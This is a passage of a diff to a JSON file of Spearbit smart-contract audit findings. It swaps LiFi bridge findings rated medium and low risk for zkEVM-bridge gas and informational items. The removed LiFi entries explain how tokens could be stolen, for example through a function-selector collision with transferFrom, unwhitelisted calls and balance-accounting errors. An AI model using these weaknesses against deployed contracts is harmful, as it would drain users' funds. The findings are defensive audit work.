initialize() to immutable via constructor", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The contracts PolygonZkEVM and PolygonZkEVMBridge initialize variables via initialize(). If these variables are never updated they could also be made immutable, which would save some gas. In order to achieve that, a constructor has to be added to set the immutable variables. This could be applicable for chainID in contract PolygonZkEVM and networkID in contract PolygonZkEVMBridge contract PolygonZkEVM is ... { ... uint64 public chainID; ... function initialize(...) ... { ... chainID = initializePackedParameters.chainID; ... } contract PolygonZkEVMBridge is ... { ... uint32 public networkID; ... function initialize(uint32 _networkID,...) ... { networkID = _networkID; ... }", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "_executeSwaps of Executor.sol doesnt have a whitelist", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The function _executeSwaps() of Executor.sol doesnt have a whitelist, whereas _executeSwaps() of SwapperV2.sol does have a whitelist. Calling arbitrary addresses is dangerous. For example, unlimited al- lowances can be set to allow stealing of leftover tokens in the Executor contract. Luckily, there wouldnt normally be allowances set from users to the Executor.sol so the risk is limited. Note: also see \"Too generic calls in GenericBridgeFacet allow stealing of tokens\" contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function _executeSwaps(... ) ... { for (uint256 i = 0; i < _swapData.length; i++) { if (_swapData[i].callTo == address(erc20Proxy)) revert UnAuthorized(); // Prevent calling ,! ERC20 Proxy directly LibSwap.SwapData calldata currentSwapData = _swapData[i]; LibSwap.swap(_lifiData.transactionId, currentSwapData); } } contract SwapperV2 is ILiFi { function _executeSwaps(... ) ... { for (uint256 i = 0; i < _swapData.length; i++) { LibSwap.SwapData calldata currentSwapData = _swapData[i]; if ( !(appStorage.dexAllowlist[currentSwapData.approveTo] && appStorage.dexAllowlist[currentSwapData.callTo] && appStorage.dexFuncSignatureAllowList[bytes32(currentSwapData.callData[:8])]) ) revert ContractCallNotAllowed(); LibSwap.swap(_lifiData.transactionId, currentSwapData); } } Based on the comments of the LiFi project there is also the use case to call more generic contracts, which do not return any token, e.g., NFT buy, carbon offset. It probably better to create new functionality to do this.", + "title": "Optimize isForceBatchAllowed()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The modier isForceBatchAllowed() includes a redundant check == true. This can be optimized to save some gas. modifier isForceBatchAllowed() { require(forceBatchAllowed == true, ... ); _; }", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "Processing of end balances", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The contract SwapperV2 has the following construction (twice) to prevent using any already start balance. it gets a start balance. does an action. if the end balance > start balance. then it uses the difference. else (which includes start balance == end balance) it uses the end balance. So if the else clause it reached it uses the end balance and ignores any start balance. If the action hasnt changed the balances then start balance == end balance and this amount is used. When the action has lowered the balances then end balance is also used. This defeats the codes purpose. Note: normally there shouldnt be any tokens in the LiFi Diamond contract so the risk is limited. Note Swapper.sol has similar code. contract SwapperV2 is ILiFi { modifier noLeftovers(LibSwap.SwapData[] calldata _swapData, address payable _receiver) { ... uint256[] memory initialBalances = _fetchBalances(_swapData); ... // all kinds of actions newBalance = LibAsset.getOwnBalance(curAsset); curBalance = newBalance > initialBalances[i] ? newBalance - initialBalances[i] : newBalance; ... } function _executeAndCheckSwaps(...) ... { ... uint256 swapBalance = LibAsset.getOwnBalance(finalTokenId); ... // all kinds of actions uint256 newBalance = LibAsset.getOwnBalance(finalTokenId); swapBalance = newBalance > swapBalance ? newBalance - swapBalance : newBalance; ... }", + "title": "Optimize loop in _updateBatchFee()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The function _updateBatchFee() uses the following check in a loop: - currentSequencedBatchData.sequencedTimestamp > veryBatchTimeTarget. block.timestamp - veryBatchTimeTarget > currentSequencedBatchData.sequencedTimestamp block.timestamp The is the same as: As block.timestamp - veryBatchTimeTarget is constant during the execution of this function, it can be taken outside the loop to save some gas. function _updateBatchFee(uint64 newLastVerifiedBatch) internal { ... while (currentBatch != currentLastVerifiedBatch) { ... if ( block.timestamp - currentSequencedBatchData.sequencedTimestamp > veryBatchTimeTarget ) { ... } } }", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "Processing of initial balances", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The LiFi code bases contains two similar source files: Swapper.sol and SwapperV2.sol. One of the differences is the processing of msg.value for native tokens, see pieces of code below. The implementation of SwapperV2.sol sends previously available native token to the msg.sender. The following is exploit example. Assume that: the LiFi Diamond contract contains 0.1 ETH. a call is done with msg.value == 1 ETH. and _swapData[0].fromAmount ETH, which is the amount to be swapped. Option 1Swapper.sol: initialBalances == 1.1 ETH - 1 ETH == 0.1 ETH. Option 2 SwapperV2.sol: initialBalances == 1.1 ETH. After the swap getOwnBalance()is1.1 - 0.5 == 0.6 ETH. Option 1 Swapper.sol: returns 0.6 - 0.1 = 0.5 ETH. Option 2 SwapperV2.sol: returns 0.6 ETH (so includes the previously present ETH). 0.5 == Note: the implementations of noLeftovers() are also different in Swapper.sol and SwapperV2.sol. Note: this is also related to the issue \"Pulling tokens by LibSwap.swap() is counterintuitive\", because the ERC20 are pulled in via LibSwap.swap(), whereas the msg.value is directly added to the balance. As there normally shouldnt be any token in the LiFi Diamond contract the risk is limited. contract Swapper is ILiFi { function _fetchBalances(...) ... { ... for (uint256 i = 0; i < length; i++) { address asset = _swapData[i].receivingAssetId; uint256 balance = LibAsset.getOwnBalance(asset); if (LibAsset.isNativeAsset(asset)) { balances[i] = balance - msg.value; } else { balances[i] = balance; } } return balances; } } contract SwapperV2 is ILiFi { function _fetchBalances(...) ... { ... for (uint256 i = 0; i < length; i++) { balances[i] = LibAsset.getOwnBalance(_swapData[i].receivingAssetId); } ... } } The following functions do a comparable processing of msg.value for the initial balance: swapAndCompleteBridgeTokensViaStargate() of Executor.sol swapAndCompleteBridgeTokens() of Executor.sol swapAndExecute() of Executor.sol swapAndCompleteBridgeTokens() of XChainExecFacet 25 if (!LibAsset.isNativeAsset(transferredAssetId)) { ... } else { startingBalance = LibAsset.getOwnBalance(transferredAssetId) - msg.value; } However in Executor.sol function swapAndCompleteBridgeTokensViaStargate() isnt optimal for ERC20 tokens because ERC20 tokens are already deposited in the contract before calling this function. function swapAndCompleteBridgeTokensViaStargate(... ) ... { ... if (!LibAsset.isNativeAsset(transferredAssetId)) { startingBalance = LibAsset.getOwnBalance(transferredAssetId); // doesn't correct for initial balance } else { ... } ,! } So assume: 0.1 ETH was in the contract. 1 ETH was added by the bridge. 0.5 ETH is swapped. Then the StartingBalance is calculated to be 0.1 ETH + 1 ETH == 1.1 ETH. So no funds are returned to the receiver as the end balance is 1.1 ETH - 0.5 ETH == 0.6 ETH, is smaller than 1.1 ETH. Whereas this should have been (1.1 ETH - 0.5 ETH) - 0.1 ETH == 0.5 ETH.", + "title": "Optimize multiplication", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The multiplication in function _updateBatchFee can be optimized to save some gas.", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "Improve dexAllowlist", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The functions _executeSwaps() of both SwapperV2.sol and Swapper.sol use a whitelist to make sure the right functions in the allowed dexes are called. The checks for approveTo, callTo and signature (callData) are independent. This means that any signature is valid for any dex combined with any approveTo address. This grands more access than necessary. This is important because multiple functions can have the same signature. For example these two functions have the same signature: gasprice_bit_ether(int128) 26 transferFrom(address,address,uint256) See bytes4_signature=0x23b872dd Note: brute forcing an innocent looking function is straightforward The transferFrom() is especially dangerous because it allows sweeping tokens from other users that have set an allowance for the LiFi Diamond. If someone gets a dex whitelisted, which contains a function with the same signature then this can be abused in the current code. Present in both SwapperV2.sol and Swapper.sol: function _executeSwaps(...) ... { ... if ( !(appStorage.dexAllowlist[currentSwapData.approveTo] && appStorage.dexAllowlist[currentSwapData.callTo] && appStorage.dexFuncSignatureAllowList[bytes32(currentSwapData.callData[:8])]) ) revert ContractCallNotAllowed(); ... } }", + "title": "Changing constant storage variables from public to private will save gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "Usually constant variables are not expected to be read on-chain and their value can easily be seen by looking at the source code. For this reason, there is no point in using public for a constant variable since it auto-generates a getter function which increases deployment cost and sometimes function call cost.", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "Pulling tokens by LibSwap.swap() is counterintuitive", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The function LibSwap.swap() pulls in tokens via transferFromERC20() from msg.sender when needed. When put in a loop, via _executeSwaps(), it can pull in multiple different tokens. It also doesnt detect accidentally sending of native tokens with ERC20 tokens. This approach is counterintuitive and leads to risks. Suppose someone wants to swap 100 USDC to 100 DAI and then 100 DAI to 100 USDT. If the first swap somehow gives back less tokens, for example 90 DAI, then LibSwap.swap() pulls in 10 extra DAI from msg.sender. Note: this requires the msg.sender having given multiple allowances to the LiFi Diamond. Another risk is that an attacker tricks a user to sign a transaction for the LiFi protocol. Within one transaction it can sweep multiple tokens from the user, cleaning out his entire wallet. Note: this requires the msg.sender having given multiple allowances to the LiFi Diamond. In Executor.sol the tokens are already deposited, so the \"pull\" functionality is not needed and can even result in additional issues. In Executor.sol it tries to \"pull\" tokens from \"msg.sender\" itself. In the best case of ERC20 implementations (like OpenZeppeling, Solmate) this has no effect. However some non standard ERC20 imple- mentations might break. 27 contract SwapperV2 is ILiFi { function _executeSwaps(...) ... { ... for (uint256 i = 0; i < _swapData.length; i++) { ... LibSwap.swap(_lifiData.transactionId, currentSwapData); } } } library LibSwap { function swap(...) ... { ... uint256 initialSendingAssetBalance = LibAsset.getOwnBalance(fromAssetId); ... uint256 toDeposit = initialSendingAssetBalance < fromAmount ? fromAmount - ,! initialSendingAssetBalance : 0; ... if (toDeposit != 0) { LibAsset.transferFromERC20(fromAssetId, msg.sender, address(this), toDeposit); } } } Use LibAsset.depositAsset() before doing", + "title": "Storage variables not changeable after deployment can be immutable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "If a storage variable is not changeable after deployment (set in the constructor) it can be turned into an immutable variable to save gas.", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "Too many bytes are checked to verify the function selector", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The function _executeSwaps() slices the callData with 8 bytes. The function selector is only 4 bytes. Also see docs So additional bytes are checked unnecessarily, which is probably unwanted. Present in both SwapperV2.sol and Swapper.sol: function _executeSwaps(...) ... { ... if ( !(appStorage.dexAllowlist[currentSwapData.approveTo] && appStorage.dexAllowlist[currentSwapData.callTo] && appStorage.dexFuncSignatureAllowList[bytes32(currentSwapData.callData[:8])]) // should be 4 ) revert ContractCallNotAllowed(); ... } } Definition of dexFuncSignatureAllowList in LibStorage.sol: struct LibStorage { ... mapping(bytes32 => bool) dexFuncSignatureAllowList; ... // could be bytes4 }", + "title": "Optimize check in _consolidatePendingState()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The check in function _consolidatePendingState() can be optimized to save some gas. As last- PendingStateConsolidated is of type uint64 and thus is at least 0, the check pendingStateNum > lastPend- ingStateConsolidated makes sure pendingStateNum > 0. So the explicit check for pendingStateNum != 0 isnt necessary. uint64 public lastPendingStateConsolidated; function _consolidatePendingState(uint64 pendingStateNum) internal { require( pendingStateNum != 0 && pendingStateNum > lastPendingStateConsolidated && pendingStateNum <= lastPendingState, \"PolygonZkEVM::_consolidatePendingState: pendingStateNum invalid\" ); ... }", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "Check address(self) isnt accidentally whitelisted", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "There are several access control mechanisms. If they somehow would allow address(self) then risks would increase as there are several ways to call arbitrary functions. library LibAccess { function addAccess(bytes4 selector, address executor) internal { ... accStor.execAccess[selector][executor] = true; } } contract AccessManagerFacet { function setCanExecute(...) ... { ) external { ... _canExecute ? LibAccess.addAccess(_selector, _executor) : LibAccess.removeAccess(_selector, ,! _executor); } } contract DexManagerFacet { function addDex(address _dex) external { ... dexAllowlist[_dex] = true; ... } function batchAddDex(address[] calldata _dexs) external { dexAllowlist[_dexs[i]] = true; ... ... } }", + "title": "Custom errors not used", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "Custom errors lead to cheaper deployment and run-time costs.", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "Verify anyswap token", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The AnyswapFacet supplies _anyswapData.token to different functions of _anyswapData.router. These functions interact with the contract behind _anyswapData.token. If the _anyswapData.token would be malicious then tokens can be stolen. Note, this is relevant if the LiFi contract are called directly without using the API. 30 function _startBridge(...) ... { ... IAnyswapRouter(_anyswapData.router).anySwapOutNative{ value: _anyswapData.amount }( _anyswapData.token,...); ... IAnyswapRouter(_anyswapData.router).anySwapOutUnderlying( _anyswapData.token, ... ); ... IAnyswapRouter(_anyswapData.router).anySwapOut( _anyswapData.token, ...); ... ,! }", + "title": "Variable can be updated only once instead of on each iteration of a loop", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "In functions sequenceBatches() and sequenceForceBatches(), the currentBatchSequenced vari- able is increased by 1 on each iteration of the loop but is not used inside of it. This means that instead of doing batchesNum addition operations, you can do it only once, after the loop.", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "More thorough checks for DAI in swapAndStartBridgeTokensViaXDaiBridge()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The function swapAndStartBridgeTokensViaXDaiBridge() checks lifiData.sendingAssetId == DAI, however it doesnt check that the result of the swap is DAI (e.g. _swapData[_swapData.length - 1].re- ceivingAssetId == DAI ). function swapAndStartBridgeTokensViaXDaiBridge(...) ... { ... if (lifiData.sendingAssetId != DAI) { revert InvalidSendingToken(); } gnosisBridgeData.amount = _executeAndCheckSwaps(lifiData, swapData, payable(msg.sender)); ... _startBridge(gnosisBridgeData); // sends DAI }", + "title": "Optimize emits in sequenceBatches() and sequenceForceBatches()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The emits in functions sequenceBatches() and sequenceForceBatches() could be gas optimized by using the tmp variables which have been just been stored in the emited global variables. function sequenceBatches(...) ... { ... lastBatchSequenced = currentBatchSequenced; ... emit SequenceBatches(lastBatchSequenced); } function sequenceForceBatches(...) ... { ... lastBatchSequenced = currentBatchSequenced; ... emit SequenceForceBatches(lastBatchSequenced); }", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "Funds transferred via Connext may be lost on destination due to incorrect receiver or calldata", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "_startBridge() in AmarokFacet.sol and NXTPFacet.sol sets user-provided receiver and call data for the destination chain. The receiver is intended to be LifiDiamond contract address on destination chain. The call data is intended such that the functions completeBridgeTokensVia{Amarok/NXTP}() or swapAnd- CompleteBridgeTokensVia{Amarok/NXTP}() are called. In case of a frontend bug or a user error, these parameters can be malformed which will lead to stuck (and stolen) funds on destination chain. Since the addresses and functions are already known, the contract can instead pass this data to Connext instead of taking it from the user. 31", + "title": "Only update lastForceBatchSequenced if nessary in function sequenceBatches()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The function sequenceBatches() writes back to lastForceBatchSequenced, however this is only necessary if there are forced batches. This could be optimized to save some gas and at the same time the calculation of nonForcedBatchesSequenced could also be optimized. function sequenceBatches(...) ... { ... uint64 currentLastForceBatchSequenced = lastForceBatchSequenced; ... if (currentBatch.minForcedTimestamp > 0) { currentLastForceBatchSequenced++; ... uint256 nonForcedBatchesSequenced = batchesNum - (currentLastForceBatchSequenced - lastForceBatchSequenced); ... lastForceBatchSequenced = currentLastForceBatchSequenced; ... , }", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "Check output of swap is equal to amount bridged", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The result of swap (amount) isnt always checked to be the same as the bridged amount (_bridge- Data.amount). This way tokens could stay in the LiFi Diamond if more tokens are received with a swap than bridged. function swapAndStartBridgeTokensViaPolygonBridge(...) ... { ... uint256 amount = _executeAndCheckSwaps(_lifiData, _swapData, payable(msg.sender)); ... _startBridge(_lifiData, _bridgeData, true); } function _startBridge(..., BridgeData calldata _bridgeData, ...) ... { ... if (LibAsset.isNativeAsset(_bridgeData.assetId)) { rootChainManager.depositEtherFor{ value: _bridgeData.amount }(_bridgeData.receiver); } else { ... LibAsset.maxApproveERC20(IERC20(_bridgeData.assetId), _bridgeData.erc20Predicate, ,! _bridgeData.amount); bytes memory depositData = abi.encode(_bridgeData.amount); rootChainManager.depositFor(_bridgeData.receiver, _bridgeData.assetId, depositData); } ... }", + "title": "Delete forcedBatches[currentLastForceBatchSequenced] after use", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The functions sequenceBatches() and sequenceForceBatches() use up the forcedBatches[] and then afterward they are no longer used. Deleting these values might give a gas refund and lower the L1 gas costs. function sequenceBatches(...) ... { ... currentLastForceBatchSequenced++; ... require(hashedForcedBatchData == ... forcedBatches[currentLastForceBatchSequenced],...); } function sequenceForceBatches(...) ... { ... currentLastForceBatchSequenced++; ... require(hashedForcedBatchData == forcedBatches[currentLastForceBatchSequenced],...); ... }", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "Missing timelock logic on the DiamondCut facets", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "In LiFi Diamond, any facet address/function selector can be changed by the contract owner. Connext, Diamond should go through a proposal window with a delay of 7 days. In function diamondCut( FacetCut[] calldata _diamondCut, address _init, bytes calldata _calldata ) external override { LibDiamond.enforceIsContractOwner(); LibDiamond.diamondCut(_diamondCut, _init, _calldata); }", + "title": "Calculate keccak256(currentBatch.transactions) once", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "cak256(currentBatch.transactions) twice. calculating the keccak256() of it could be relatively expensive. sequenceBatches() functions Both kec- sequenceForceBatches() As the currentBatch.transactions could be rather large, calculate and function sequenceBatches(BatchData[] memory batches) ... { ... if (currentBatch.minForcedTimestamp > 0) { ... bytes32 hashedForcedBatchData = ... keccak256(currentBatch.transactions) ... ... } ... currentAccInputHash = ... keccak256(currentBatch.transactions) ... ... } function sequenceForceBatches(ForcedBatchData[] memory batches) ... { ... bytes32 hashedForcedBatchData = ... keccak256(currentBatch.transactions) ... ... currentAccInputHash = ... keccak256(currentBatch.transactions) ... ... }", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "Data from emit LiFiTransferStarted() cant be relied on", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Most of the function do an emit like LiFiTransferStarted(). Some of the fields of the emits are (sometimes) verified, but most fields come from the input variable _lifiData. The problem with this is that anyone can do solidity transactions to the LiFi bridge and supply wrong data for the emit. For example: transfer a lot of Doge coins and in the emit say they are transferring wrapped BTC. Then the statistics would say a large amount of volume has been transferred, while in reality it is neglectable. The advantage of using a blockchain is that the data is (seen as) reliable. If the data isnt reliable, it isnt worth the trouble (gas cost) to store it in a blockchain and it could just be stored in an offline database. The result of this is, its not useful to create a subgraph on the emit data (because it is unreliable). This would mean a lot of extra work for subgraph builders to reverse engineer what is going on. Also any kickback fees to in- tegrators or referrers cannot be based on this data because it is unreliable. Also user interfaces & dashboards could display the wrong information. 33 function startBridgeTokensViaOmniBridge(LiFiData calldata _lifiData, ...) ... { ... LibAsset.depositAsset(_bridgeData.assetId, _bridgeData.amount); _startBridge(_lifiData, _bridgeData, _bridgeData.amount, false); } function _startBridge(LiFiData calldata _lifiData, ... ) ... { ... // do actions emit LiFiTransferStarted( _lifiData.transactionId, \"omni\", \"\", _lifiData.integrator, _lifiData.referrer, _lifiData.sendingAssetId, _lifiData.receivingAssetId, _lifiData.receiver, _lifiData.amount, _lifiData.destinationChainId, _hasSourceSwap, false ); }", + "title": "Function denition of onMessageReceived()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "As discovered by the project: the function denition of onMessageReceived() is view and returns a boolean. Also, it is not payable. The function is meant to receive ETH so it should be payable. Also, it is meant to take action so is shouldnt be view. The bool return value isnt used in PolygonZkEVMBridge so isnt necessary. Because the function is called via a low-level call this doesnt pose a problem in practice. The current denition is confusing though. interface IBridgeMessageReceiver { function onMessageReceived(...) external view returns (bool); } contract PolygonZkEVMBridge is ... { function claimMessage( ... ) ... { ... (bool success, ) = destinationAddress.call{value: amount}( abi.encodeCall( IBridgeMessageReceiver.onMessageReceived, (originAddress, originNetwork, metadata) ) ); require(success, \"PolygonZkEVMBridge::claimMessage: Message failed\"); ... } }", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Missing emit in XChainExecFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The function swapAndCompleteBridgeTokens of Executor does do an emit LiFiTransferCom- pleted , while the comparable function in XChainExecFacet doesnt do this emit. This way there will be missing emits. contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function swapAndCompleteBridgeTokens(LiFiData calldata _lifiData, ... ) ... { ... emit LiFiTransferCompleted( ... ); } } contract XChainExecFacet is SwapperV2, ReentrancyGuard { function swapAndCompleteBridgeTokens(LiFiData calldata _lifiData, ... ) ... { ... // no emit } }", + "title": "batchesNum can be explicitly casted in sequenceForceBatches()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The sequenceForceBatches() function performs a check to ensure that the sequencer does not sequence forced batches that do not exist. The require statement compares two different types; uint256 and uint64. For consistency, the uint256 can be safely cast down to uint64 as solidity 0.8.0 checks for over- ow/underow.", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Different access control to withdraw funds", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "To withdraw any stuck tokens, WithdrawFacet.sol provides two functions: executeCallAndWith- draw() and withdraw(). Both have different access controls on them. executeCallAndWithdraw() can be called by the owner or if msg.sender has been approved to call a function whose signature matches that of executeCallAndWithdraw(). withdraw() can only be called by the owner. If the function signature of executeCallAndWithdraw() clashes with an approved signature in execAccess map- ping, the approved address can steal all the funds in LifiDiamond contract.", + "title": "Metadata are not migrated on changes in l1 contract", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "wrapped tokens metadata will not change and would point to the older decimal If metadata changes on mainnet (say decimal change) after wrapped token creation then also 1. Token T1 was on mainnet with decimals 18. 2. This was bridged to rollup R1. 3. A wrapped token is created with decimal 18. 4. On mainnet T1 decimal is changed to 6. 5. Wrapped token on R1 still uses 18 decimals.", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Use internal where possible", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Several functions have an access control where the msg.sender if compared to address(this), which means it can only be called from the same contract. In the current code with the various generic call mechanisms this isnt a safe check. For example the function _execute() from Executor.sol can circumvent this check. Luckily the function where this has been used have a low risk profile so the risk of this issue is limited. function swapAndCompleteBridgeTokensViaStargate(...) ... { if (msg.sender != address(this)) { revert InvalidCaller(); } ... }", + "title": "Remove unused import in PolygonZkEVMGlobalExitRootL2", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The contract PolygonZkEVMGlobalExitRootL2 imports SafeERC20.sol, however, this isnt used in the contract. import \"@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol\"; contract PolygonZkEVMGlobalExitRootL2 { }", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Event of transfer is not emitted in the AxelarFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The usage of the LiFi protocol depends largely to the off chain APIs. It takes all values, fees, limits, chain ids and addresses to be called from the APIs. The events are useful to record these changes on-chain for off-chain monitors/tools/interfaces when integrating with off-chain APIs. Although, other facets are emitting LiFiTransferStarted event, AxelarFacet does not emit this event. contract AxelarFacet { function executeCallViaAxelar(...) ... {} function executeCallWithTokenViaAxelar(...) ... {} } On the receiving side, the Executor contract does do an emit in function _execute() but not in function _- executeWithToken(). contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function _execute(...) ... { ... emit AxelarExecutionComplete(callTo, bytes4(callData)); } function _executeWithToken( ... // no emit } }", + "title": "Switch from public to external for all non-internally called methods", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "Functions that are not called from inside of the contract should be external instead of public, which prevents accidentally using a function internally that is meant to be used externally. See also issue \"Use calldata instead of memory for function parameters\".", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational DepositContract.sol#L90, DepositContract.sol#L124, PolygonZkEVMGlobalExitRootL2.sol#L40, PolygonZkEVM-" ] }, { - "title": "Improve checks on the facets", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "In the facets, receiver/destination address and amount checks are missing. The symbol parameter is used to get address of token with gateways tokenAddresses function. tokenAd- dresses function get token address by mapping. If the symbol does not exist, the token address can be zero. AxelarFacet and Executor do not check If the given symbol exists or not. 36 contract AxelarFacet { function executeCallWithTokenViaAxelar(...) ... { address tokenAddress = s.gateway.tokenAddresses(symbol); } function initAxelar(address _gateway, address _gasReceiver) external { s.gateway = IAxelarGateway(_gateway); s.gasReceiver = IAxelarGasService(_gasReceiver); } } contract Executor { function _executeWithToken(...) ... { address tokenAddress = s.gateway.tokenAddresses(symbol); } } GnosisBridgeFacet, CBridgeFacet, HopFacet and HyphenFacets are missing receiver address/amount check. contract CBridgeFacet { function _startBridge(...) ... { ... _cBridgeData.receiver ... } } contract GnosisBridgeFacet { function _startBridge(...) ... { ... gnosisBridgeData.receiver ... } } contract HopFacet { function _startBridge(...) ... { _hopData.recipient, ... ... } } contract HyphenFacet { function _startBridge(...) ... { _hyphenData.recipient ... ... } }", + "title": "Common interface for PolygonZkEVMGlobalExitRoot and PolygonZkEVMGlobalExitRootL2", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The contract PolygonZkEVMGlobalExitRoot inherits from IPolygonZkEVMGlobalExitRoot, while PolygonZkEVMGlobalExitRootL2 doesnt, although they both implement a similar interface. Note: PolygonZkEVMGlobalExitRoot implements an extra function getLastGlobalExitRoot(). the same interface le would improve the checks by the compiler. Inheriting from import \"@openzeppelin/contracts-upgradeable/proxy/utils/Initializable.sol\"; contract PolygonZkEVMGlobalExitRoot is IPolygonZkEVMGlobalExitRoot, ... { ... } contract PolygonZkEVMGlobalExitRootL2 { }", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Informational" ] }, { - "title": "Use keccak256() instead of hex", - "html_url": 